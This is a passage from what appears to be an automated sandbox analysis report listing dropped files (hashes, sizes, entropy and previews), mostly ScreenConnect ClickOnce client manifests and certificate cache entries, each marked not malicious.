                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):88002
                                                                                                                                                                                                                                                Entropy (8bit):3.0240756555405723
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:pQbVGU4+LZzwe8z8ZzZ8jvEbTPvNDbejw:pQbVGU4+LZzwe8z8ZzZ8jvEbTPvNDbcw
                                                                                                                                                                                                                                                MD5:69D928874CE8DD7F5F43EF457AE18972
                                                                                                                                                                                                                                                SHA1:95EBFE1883EA9CD43D1DF159E36560B661059C22
                                                                                                                                                                                                                                                SHA-256:8376A2708D26E17EA1BA39C4E2EBF749C65ABE424054D4E12083E700C63B2B47
                                                                                                                                                                                                                                                SHA-512:B32361FD213AF9D89C3905BC204B444524C7F03EDEEF19FB63E918044EA3A10A7638A9145CF9DBC21923812E3F02B5016EA025E1F66996454A6D6A0407ABBD2B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                Entropy (8bit):2.6859759327063455
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:TiZYWi2pkeOHYlYxW8dHSeYEZqPtEir4dkCwcUwmapC3MEINICn3:2ZD+yJDTapC3MEISCn3
                                                                                                                                                                                                                                                MD5:552CCF0FB4147FA2EB35B69CA1AB0A5E
                                                                                                                                                                                                                                                SHA1:B2518BC75D92791BD792D461C1D8B932D2A7A5C9
                                                                                                                                                                                                                                                SHA-256:0757D77EE3DD1F7740BF3B09A47FE271C7C71521D3A7466427CF087DD2755375
                                                                                                                                                                                                                                                SHA-512:6A29E673195BF1C3295CFE7ED6B5B3359A8FAA88B48AF3C8B301B81483E8C7DCD6F7F4090A55211EEA9788ED60FB68EB777F75B3574BB5406C551F4030F00983
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):71954
                                                                                                                                                                                                                                                Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1716
                                                                                                                                                                                                                                                Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):727
                                                                                                                                                                                                                                                Entropy (8bit):7.512353515557083
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:5onfZ1hc5RlRtBfQXhB/sHEAoL2FZ1yJ7T9XNSRs0NI81tWaPlsIPZKkQ9lj:5iThcdZIhB/uW2FZ1yVkspgWa93QD
                                                                                                                                                                                                                                                MD5:271780FDF709DBBC7FF8997916DCDBA5
                                                                                                                                                                                                                                                SHA1:F93DF4EE548800E6FBE55452E608474F677CB6DD
                                                                                                                                                                                                                                                SHA-256:24E9B94B4EBB50EC14FBABD460D89B1787325C039E2DF11EB801C91E62A21FD5
                                                                                                                                                                                                                                                SHA-512:F2AF1679152BE6D5793209CD5C07A7C2F6C2D9ED61ADA057594FE547DD2BA4B547C0F7A4A2EFD25E22F31FCB8F6776A53A5CF42E997DA95E030215125CD94243
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1428
                                                                                                                                                                                                                                                Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):340
                                                                                                                                                                                                                                                Entropy (8bit):3.5401317696123327
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kKVtklK8fNaG7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:rrMN7LkPlE99SCQl2DUeXJlOA
                                                                                                                                                                                                                                                MD5:8901868F4B3F6D637B617B9067B36C9E
                                                                                                                                                                                                                                                SHA1:8C5E16FFA35534EA3FEC1CA456F7367B1A7A2674
                                                                                                                                                                                                                                                SHA-256:C50B625F489468D3D120AB51665D32B05E1169589D2A6EA9109C4B6DC377D33C
                                                                                                                                                                                                                                                SHA-512:101FD92953256C99E12BB8414E690C1FC31A753A3FFBFD440D2D9C6E0572C8E0AA5A3DE8254062EF4A65471B43C3ACEE58D28BADD1BFE12CC4845BB5C13F9A18
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... .........K..wV..(................................................Y.S.T.. ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                Entropy (8bit):3.247897867253902
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kK3U3l99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:fUqDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                MD5:923AB844CA25117E423F82A264E1501B
                                                                                                                                                                                                                                                SHA1:7FC8E48534776847DBAF43B93B243F563D290735
                                                                                                                                                                                                                                                SHA-256:944959EBF2CD6790C3BE0CD08B21E8E0AEF7275D9FED6C21EBD4C2F96D48AE82
                                                                                                                                                                                                                                                SHA-512:7D2C8612C4933C0C87FE065EAB99F53BFDF4E76FA04A146418160C6CC7132AB3144EB859AFF667702EA8595F791834563A440B5C338853F494490B9596723EB4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... .............T..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):308
                                                                                                                                                                                                                                                Entropy (8bit):3.1818604406705786
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kKZR3zNcalgRAOAUSW0P3PeXJUwh8lmi3Y:3CtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                MD5:0DEFF27B805C7520BAF693D5888D2D9A
                                                                                                                                                                                                                                                SHA1:099FFB8396BBD3931ADB2E173DEED2B84C2D1BF6
                                                                                                                                                                                                                                                SHA-256:6A9D3DCF788E5C4BA00C70BE8140FDBCD6C57BA7591231CCDE236BAC554DF180
                                                                                                                                                                                                                                                SHA-512:9010BA3A3434EAB79D309267ECE8EAF665F1422DC508C8C6A0A46DF0CA9018B130C4047470A7AF972D2D856D806CEC33992B01F2140B379E751DC822F56874DD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... ........r%t..U..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):412
                                                                                                                                                                                                                                                Entropy (8bit):3.9835320758881108
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kKguUBrTtrQ3yfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:IusrxmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                MD5:EE49DB23015A5D91395073B19984756D
                                                                                                                                                                                                                                                SHA1:562FE0575446C94EB447E8A2B86A0F906C11B3E4
                                                                                                                                                                                                                                                SHA-256:9E1A149A915D1CE5A32A19C4D110EB7A7D69C1C79CE0200E847D3CE1CD566C5E
                                                                                                                                                                                                                                                SHA-512:811C16F46C4A0F7A7CC09DD355857EF57A1D59EC918CA9D775932D0BBC8ECCC2FFC1DD760DF4A4200AEB16AA09E9D3A71B7EFF06AF3D62FA57016100C97C0877
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... ....(....9...T..(....................S.....6XY.....................6XY.. ......../..^T.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                                                                Entropy (8bit):3.052898866971229
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kKipLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:yLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                MD5:595825846F05157BCC516613DA931788
                                                                                                                                                                                                                                                SHA1:0A13C571C5F82C6EBC5823CE175CEEF10A303686
                                                                                                                                                                                                                                                SHA-256:AEF6119050BE7A3BDC61F5E019D400925168B1E9FA0614CE9FC87C80C37EBFC0
                                                                                                                                                                                                                                                SHA-512:944A3D5E6B49427642CE33F0C204E4D6D49568C3063600C250AE5C2E2C984299139AC5682653196D3735825B436A0AD49BC0C73F01A5EDBDE54FDE191F21A262
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... ....l....[.@.T..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25496
                                                                                                                                                                                                                                                Entropy (8bit):5.556128670031695
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:SlquBOGo26tX9DkX9R/QPIBM7YvkZdgXhO5YKTd5//:Ssqo26tX9DkX9R/QPI+0cDYKTd53
                                                                                                                                                                                                                                                MD5:CB94AF80BB2FB9880CF4BFB4F4092BCB
                                                                                                                                                                                                                                                SHA1:E9E939B7AD57CFE7983360521B89D23323B03222
                                                                                                                                                                                                                                                SHA-256:BF89E65893BA6A641C20EC60093FB2735D611FDCE88EB7E2698D382B7BE728BA
                                                                                                                                                                                                                                                SHA-512:BB52D5BE4F7003A8B6B5D718773A54E4082253FDB6189268E9B1E51392D97D60C42CEABF624551D268A37A010CA93412D9CAEE551375E97110C7F3A981A6BEA2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3452
                                                                                                                                                                                                                                                Entropy (8bit):4.331504265817368
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:3IEfBeF7lWuWW+Lg0e6S+9owQX7g27mL438ciUcVM8Aw+ik2hIYX:3J3uWWWeV+WwQXlmL4MckVM8Aw+ehIYX
                                                                                                                                                                                                                                                MD5:4911C71204D1F502DBA5DD5DFB6BE06B
                                                                                                                                                                                                                                                SHA1:80CB0D5FA8D58FE6969CBFDEF62FEF25B381608B
                                                                                                                                                                                                                                                SHA-256:BA3B51A18463F85B3F6E65DCA50301D2394FD0E8635D8B0AFD33F795BE5494A2
                                                                                                                                                                                                                                                SHA-512:E1D1DD8BAF09E265DFC91E6C766C57C240F87983F2B67F8277B43523B3332732A242AE8FECD676A121A40A9FD2A008530576AFAEDE1C9B93E27B8500D190F014
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PcmH........9^...9.#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5260
                                                                                                                                                                                                                                                Entropy (8bit):4.224790743127518
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:sMNq6R84zeV+Ww7mk9O43jYHlIgBXw0vy3ydwnjIbm:sUR840JC9tUHlXBXmTjd
                                                                                                                                                                                                                                                MD5:673DA9D0245654BA2792875F37133E8A
                                                                                                                                                                                                                                                SHA1:83E3F6F7021288817E7687D2EEE2869F61116E08
                                                                                                                                                                                                                                                SHA-256:F4F5E0ECC7E3B43C7836CCD588332374265BAF43A75C5A88A83CB9CCC8424500
                                                                                                                                                                                                                                                SHA-512:D7CBC33EBAD117367C97747A6C32693469E77DAE902F325FEF73633967BAE2AF45A89683F62CB23F606399B020EDAD2E514438812A3108D0E896E1805AE4C234
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6588
                                                                                                                                                                                                                                                Entropy (8bit):4.117153651608771
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:YMmxneV+WwwU8WpZ2LRheuMl2UfdVaMsmksJqi/D5:sxAJwpZ2LRhyl5dVzQw75
                                                                                                                                                                                                                                                MD5:D460BF8252B447DF4DBBAFEDD3A16934
                                                                                                                                                                                                                                                SHA1:1F5468F62EAF84128BC68765A65F3496E987F3D6
